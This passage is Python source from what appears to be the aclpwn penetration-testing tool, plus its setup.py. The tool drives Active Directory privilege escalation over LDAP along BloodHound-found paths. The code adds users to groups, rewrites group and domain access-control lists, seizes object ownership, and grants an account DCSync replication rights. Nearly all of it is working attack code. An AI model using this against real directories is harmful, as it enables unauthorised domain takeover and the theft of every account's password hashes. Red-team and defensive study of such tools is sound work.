    acedata['Flags'] = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ACE_OBJECT_TYPE_PRESENT
    nace['Ace'] = acedata
    return nace

# Get object info from samname
def get_object_info(ldapconnection, samname):
    entries = ldapconnection.search(get_ldap_root(ldapconnection), '(sAMAccountName=%s)' % escape_filter_chars(samname), attributes=['objectSid'])
    try:
        dn = ldapconnection.entries[0].entry_dn
        sid_object = LDAP_SID(ldapconnection.entries[0]['objectSid'].raw_values[0])
        sid = sid_object.formatCanonical()
        return (dn, sid)
    except IndexError:
        raise ExploitException('User not found in LDAP: %s' % samname)

def add_user_to_group(ldapconnection, state, user_sam, group_bh_name):
    # For display only
    group_sam = get_sam_name(group_bh_name)
    group_dn = get_object_info(ldapconnection, group_sam)[0]
    user_dn = get_object_info(ldapconnection, user_sam)[0]

    # Dictionary for restore data
    restoredata = {}

    # Save DNs
    restoredata['group_dn'] = group_dn
    restoredata['user_dn'] = user_dn

    # Now add the user as a member to this group
    res = ldapconnection.modify(group_dn, {
        'member': [(ldap3.MODIFY_ADD, [user_dn])]
    })
    if res:
        restoredata['success'] = True
        state.push_history('add_user_to_group', restoredata)
        print_o('Added %s as member to %s' % (user_dn, group_dn))
        return True
    else:
        # This means the user is already a member
        if ldapconnection.result['result'] == 68:
            print_m('Could not add %s to group %s since they are already a member, your BloodHound data may be out of date, continuing anyway!' % (user_dn, group_dn))
            # Treat this as a success
            restoredata['success'] = True
            state.push_history('add_user_to_group', restoredata)
            return True
        restoredata['success'] = False
        state.push_history('add_user_to_group', restoredata)
        raise ExploitException('Failed to add %s to group %s: %s' % (user_dn, group_dn, str(ldapconnection.result)))

def get_ldap_root(ldapconnection):
    return ldapconnection.server.info.other['defaultNamingContext'][0]

def add_domain_sync(ldapconnection, state, user_sam, domain_name):
    # Query for the sid of our target user
    userdn, usersid = get_object_info(ldapconnection, user_sam)

    # Set SD flags to only query for DACL
    controls = security_descriptor_control(sdflags=0x04)

    # Dictionary for restore data
    restoredata = {}

    # print_m('Querying domain security descriptor')
    ldapconnection.search(get_ldap_root(ldapconnection), '(&(objectCategory=domain))', attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls)
    entry = ldapconnection.entries[0]

    # This shouldn't happen but lets be sure just in case
    if ldap2domain(entry.entry_dn).upper() != domain_name.upper():
        raise ExploitException('Wrong domain! LDAP returned the domain %s but escalation was requested to %s' % (ldap2domain(entry.entry_dn).upper(), domain_name.upper()))

    secDescData = entry['nTSecurityDescriptor'].raw_values[0]

    # Save old SD for restore purposes
    restoredata['old_sd'] = binascii.hexlify(secDescData).decode('utf-8')
    restoredata['target_sid'] = usersid

    secDesc = ldaptypes.SR_SECURITY_DESCRIPTOR(data=secDescData)

    # We need "control access" here for the extended attribute
    accesstype = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_CONTROL_ACCESS

    # these are the GUIDs of the get-changes and get-changes-all extended attributes
    secDesc['Dacl']['Data'].append(create_object_ace('1131f6aa-9c07-11d1-f79f-00c04fc2dcd2', usersid, accesstype))
    secDesc['Dacl']['Data'].append(create_object_ace('1131f6ad-9c07-11d1-f79f-00c04fc2dcd2', usersid, accesstype))

    dn = entry.entry_dn
    restoredata['target_dn'] = dn
    data = secDesc.getData()
    res = ldapconnection.modify(dn, {'nTSecurityDescriptor':(ldap3.MODIFY_REPLACE, [data])}, controls=controls)
    if res:
        print_o('Dacl modification successful')
        # Query the SD again to see what AD made of it
        ldapconnection.search(get_ldap_root(ldapconnection), '(&(objectCategory=domain))', attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls)
        entry = ldapconnection.entries[0]
        newSD = entry['nTSecurityDescriptor'].raw_values[0]
        # Save this to restore the SD later on
        restoredata['new_sd'] = binascii.hexlify(newSD).decode('utf-8')
        restoredata['success'] = True
        state.push_history('add_domain_sync', restoredata)
        return True
    else:
        restoredata['success'] = False
        state.push_history('add_domain_sync', restoredata)
        raise ExploitException('Failed to add DCSync privs to %s: %s' % (userdn, str(ldapconnection.result)))

def add_addmember_privs(ldapconnection, state, user_sam, group_bh_name):
    # Query for the sid of our target user
    userdn, usersid = get_object_info(ldapconnection, user_sam)

    # Set SD flags to only query for DACL
    controls = security_descriptor_control(sdflags=0x04)

    # Dictionary for restore data
    restoredata = {}

    # print_m('Querying group security descriptor')
    group_sam = get_sam_name(group_bh_name)
    ldapconnection.search(get_ldap_root(ldapconnection), '(sAMAccountName=%s)' % escape_filter_chars(group_sam), attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls)
    entry = ldapconnection.entries[0]

    secDescData = entry['nTSecurityDescriptor'].raw_values[0]
    secDesc = ldaptypes.SR_SECURITY_DESCRIPTOR(data=secDescData)

    # Save old SD for restore purposes
    restoredata['old_sd'] = binascii.hexlify(secDescData).decode('utf-8')
    restoredata['target_sid'] = usersid

    # We need "write property" here to write to the "member" attribute
    accesstype = ldaptypes.ACCESS_ALLOWED_OBJECT_ACE.ADS_RIGHT_DS_WRITE_PROP
    # this is the GUID of the Member attribute
    secDesc['Dacl']['Data'].append(create_object_ace('bf9679c0-0de6-11d0-a285-00aa003049e2', usersid, accesstype))
    dn = entry.entry_dn
    restoredata['target_dn'] = dn
    data = secDesc.getData()
    res = ldapconnection.modify(dn, {'nTSecurityDescriptor':(ldap3.MODIFY_REPLACE, [data])}, controls=controls)
    if res:
        print_o('Dacl modification successful')
        # Query the SD again to see what AD made of it
        ldapconnection.search(dn, '(objectClass=*)', search_scope=ldap3.BASE , attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls)
        entry = ldapconnection.entries[0]
        newSD = entry['nTSecurityDescriptor'].raw_values[0]
        newSecDesc = ldaptypes.SR_SECURITY_DESCRIPTOR(data=newSD)
        # Save this to restore the SD later on
        restoredata['new_sd'] = binascii.hexlify(newSD).decode('utf-8')
        restoredata['success'] = True
        state.push_history('add_addmember_privs', restoredata)
        return True
    else:
        restoredata['success'] = False
        state.push_history('add_addmember_privs', restoredata)
        # filter out already exists?
        raise ExploitException('Failed to add WriteMember privs for %s to group %s: %s' % (userdn, dn, str(ldapconnection.result)))

def write_owner(ldapconnection, state, user_sam, group_bh_name):
    # Query for the sid of our target user
    userdn, usersid = get_object_info(ldapconnection, user_sam)

    # Set SD flags to only query for owner
    controls = security_descriptor_control(sdflags=0x01)
    group_sam = get_sam_name(group_bh_name)

    # Dictionary for restore data
    restoredata = {}

    ldapconnection.search(get_ldap_root(ldapconnection), '(sAMAccountName=%s)' % escape_filter_chars(group_sam), attributes=['SAMAccountName','nTSecurityDescriptor'], controls=controls)
    entry = ldapconnection.entries[0]

    secDescData = entry['nTSecurityDescriptor'].raw_values[0]
    secDesc = ldaptypes.SR_SECURITY_DESCRIPTOR(data=secDescData)
    if secDesc['OwnerSid'].formatCanonical() == usersid:
        print_m('%s is already owned by %s, skipping' % (group_sam, user_sam))
        return True

    # Save old SD for restore purposes
    restoredata['old_sd'] = binascii.hexlify(secDescData).decode('utf-8')
    restoredata['target_sid'] = usersid
    restoredata['old_owner_sid'] = secDesc['OwnerSid'].formatCanonical()

    # Modify the sid
    secDesc['OwnerSid'] = LDAP_SID()
    secDesc['OwnerSid'].fromCanonical(usersid)


    dn = entry.entry_dn
    restoredata['target_dn'] = dn
    data = secDesc.getData()
    res = ldapconnection.modify(dn, {'nTSecurityDescriptor':(ldap3.MODIFY_REPLACE, [data])}, controls=controls)
    if res:
        print_o('Owner change successful')
        restoredata['success'] = True
        state.push_history('write_owner', restoredata)
        return True
    else:
        restoredata['success'] = False
        state.push_history('write_owner', restoredata)
        raise ExploitException('Failed to change owner of group %s to %s: %s' % (dn, userdn, str(ldapconnection.result)))

def rebind_ldap(ldapconnection, user, password, domain=None):
    if domain is None:
        domain = get_domain(user)
    if '@' in user:
        user = get_sam_name(user)
    if not ldapconnection.rebind('%s\\%s' % (domain, user), password, authentication=ldap3.NTLM):
        raise ExploitException('Failed to switch context to %s\\%s: %s' % (domain, user, str(ldapconnection.result)))

def connect_ldap(server, user, password, domain=None):
    if domain is None:
        domain = get_domain(user)
    if '@' in user or '.' in user:
        user = get_sam_name(user)
    ldapserver = ldap3.Server(server, get_info=ldap3.DSA)
    connection = ldap3.Connection(ldapserver, user='%s\\%s' % (domain, user), password=password, authentication=ldap3.NTLM)
    if not connection.bind():
        raise ExploitException('Failed to connect to the LDAP server as %s\\%s: %s' % (domain, user, str(connection.result)))
    return connection

def perform_rebind(ldapconnection, contextuser, config, confdict):
    if config.user is not None and contextuser != config.user:
        # we should now switch context to the new user
        print_m('Switching context to %s' % config.user)
        if not config.password:
            prompt = 'Please supply the password or LM:NTLM hashes for the account %s: ' % config.user
            config.password = getpass.getpass(prompt.encode('utf-8'))
        rebind_ldap(ldapconnection, config.user, config.password, config.domain)
        contextuser = config.user
        print_o('Done switching context')
    else:
        # we should re-bind to refresh our access rights
        print_m('Re-binding to LDAP to refresh group memberships of %s' % contextuser)
        # Password depends on the context we are under
        if contextuser == config.user:
            password = config.password
        else:
            password = config.source_password
        rebind_ldap(ldapconnection, contextuser, password, config.domain)
        print_o('Re-bind successful')
    return contextuser

def test_path(path):
    for relationship, endnode in path:
        if relationship.type == 'MemberOf':
            continue
        elif relationship.type == 'AddMember':
            if 'Group' in endnode.labels:
                continue
            else:
                print_f('Unsupported operation: %s on %s (%s)' % (relationship.type, endnode.get('name'), ','.join(endnode.labels)))
                return False
        elif relationship.type in ['DCSync', 'GetChangesAll']:
            continue
        elif relationship.type in ['WriteDacl', 'GenericAll', 'GenericWrite', 'Owns']:
            if 'Group' in endnode.labels:
                continue
            elif 'Domain' in endnode.labels:
                continue
            else:
                print_f('Unsupported operation: %s on %s (%s)' % (relationship.type, endnode.get('name'), ','.join(endnode.labels)))
                return False
        elif relationship.type == 'WriteOwner':
            if 'Group' in endnode.labels:
                continue
            elif 'Domain' in endnode.labels:
                continue
            else:
                print_f('Unsupported operation: %s on %s (%s)' % (relationship.type, endnode.get('name'), ','.join(endnode.labels)))
                return False
        else:
            print_f('Unsupported operation: %s on %s (%s)' % (relationship.type, endnode.get('name'), ','.join(endnode.labels)))
            return False
    return True

def walk_path(path, config, ldapconnection, dry_run=False):
    # User we are currently bound as
    contextuser = config.from_object
    if ldapconnection is None and not dry_run:
        if config.server:
            server = config.server
        else:
            server = config.domain
        ldapconnection = connect_ldap(server, contextuser, config.source_password, config.domain)

    # The user used for exploitation
    # if this user is not specified, the "from" user is assumed
    if config.user is None:
        targetuser = get_sam_name(config.from_object)
    else:
        targetuser = config.user

    # This is our task queue
    task_queue = []
    # This is the state which gets modified along the way
    state = ExploitState(ldapconnection, contextuser, targetuser, config)

    for relationship, endnode in path:
        if relationship.type == 'MemberOf':
            if not dry_run:
                task_queue.append(MessageTask(print_m, 'Memberof -> continue'))
            continue
        elif relationship.type in ['AddMember', 'AllExtendedRights']:
            if 'Group' in endnode.labels:
                task_queue.append(MessageTask(print_m, 'Adding user %s to group %s' % (targetuser, endnode.get('name'))))
                task_queue.append(ExploitTask(state, add_user_to_group, endnode.get('name'), True))
            else:
                print_f('Unsupported operation: %s on %s (%s)' % (relationship.type, endnode.get('name'), ','.join(endnode.labels)))
                return False
        elif relationship.type in ['DCSync', 'GetChangesAll']:
            task_queue.append(MessageTask(print_m, 'DCSync -> continue'))
            continue
        elif relationship.type in ['WriteDacl', 'GenericAll', 'GenericWrite', 'Owns']:
            if 'Group' in endnode.labels:
                if relationship.type in ['WriteDacl', 'Owns']:
                    task_queue.append(MessageTask(print_m, 'Modifying group DACL of %s to give AddMember rights to %s' % (endnode.get('name'), targetuser)))
                    task_queue.append(ExploitTask(state, add_addmember_privs, endnode.get('name'), True))
                task_queue.append(MessageTask(print_m, 'Adding user %s to group %s' % (targetuser, endnode.get('name'))))
                task_queue.append(ExploitTask(state, add_user_to_group, endnode.get('name'), True))
            elif 'Domain' in endnode.labels:
                # GenericAll exception?
                task_queue.append(MessageTask(print_m, 'Modifying domain DACL to give DCSync rights to %s' % targetuser))
                task_queue.append(ExploitTask(state, add_domain_sync, endnode.get('name')))
            else:
                print_f('Unsupported operation: %s on %s (%s)' % (relationship.type, endnode.get('name'), ','.join(endnode.labels)))
                return False
        elif relationship.type == 'WriteOwner':
            if 'Group' in endnode.labels:
                task_queue.append(MessageTask(print_m, 'Modifying owner of group %s to %s' % (endnode.get('name'), targetuser)))
                task_queue.append(ExploitTask(state, write_owner, endnode.get('name'), True))
                task_queue.append(MessageTask(print_m, 'Modifying group DACL of %s to give AddMember rights to %s' % (endnode.get('name'), targetuser)))
                task_queue.append(ExploitTask(state, add_addmember_privs, endnode.get('name'), True))
                task_queue.append(MessageTask(print_m, 'Adding user %s to group %s' % (targetuser, endnode.get('name'))))
                task_queue.append(ExploitTask(state, add_user_to_group, endnode.get('name'), True))
            elif 'Domain' in endnode.labels:
                task_queue.append(MessageTask(print_m, 'Modifying owner of the domain object %s to %s' % (endnode.get('name'), targetuser)))
                task_queue.append(ExploitTask(state, write_owner, (endnode.get('name')), True))
                task_queue.append(MessageTask(print_m, 'Modifying domain DACL to give DCSync rights to %s' % targetuser))
                task_queue.append(ExploitTask(state, add_domain_sync, endnode.get('name')))
            else:
                print_f('Unsupported operation: %s on %s (%s)' % (relationship.type, endnode.get('name'), ','.join(endnode.labels)))
                return False
        else:
            print_f('Unsupported operation: %s on %s (%s)' % (relationship.type, endnode.get('name'), ','.join(endnode.labels)))
            return False
    return task_queue, state

def run_tasks(task_queue, dry_run):
    for task in task_queue:
        # We skip Exploit tasks if we're on a dry run
        if isinstance(task, ExploitTask) and dry_run:
            continue
        task.call()



from setuptools import setup

setup(name='aclpwn',
      version='1.0.0',
      description='Active Directory ACL exploitation using BloodHound',
      license='MIT',
      classifiers=[
          'Intended Audience :: Information Technology',
          'License :: OSI Approved :: MIT License',
          'Programming Language :: Python :: 2',
          'Programming Language :: Python :: 2.7',
          'Programming Language :: Python :: 3',
          'Programming Language :: Python :: 3.5',
          'Programming Language :: Python :: 3.6',
      ],
      author='Dirk-jan Mollema / Fox-IT',
      author_email='dirkjan.mollema@fox-it.com',
      url='https://github.com/fox-it/aclpwn.py',
      packages=['aclpwn'],
      install_requires=['impacket', 'ldap3>=2.5', 'neo4j-driver', 'requests'],
      entry_points={
          'console_scripts': ['aclpwn=aclpwn:main']
      }
     )
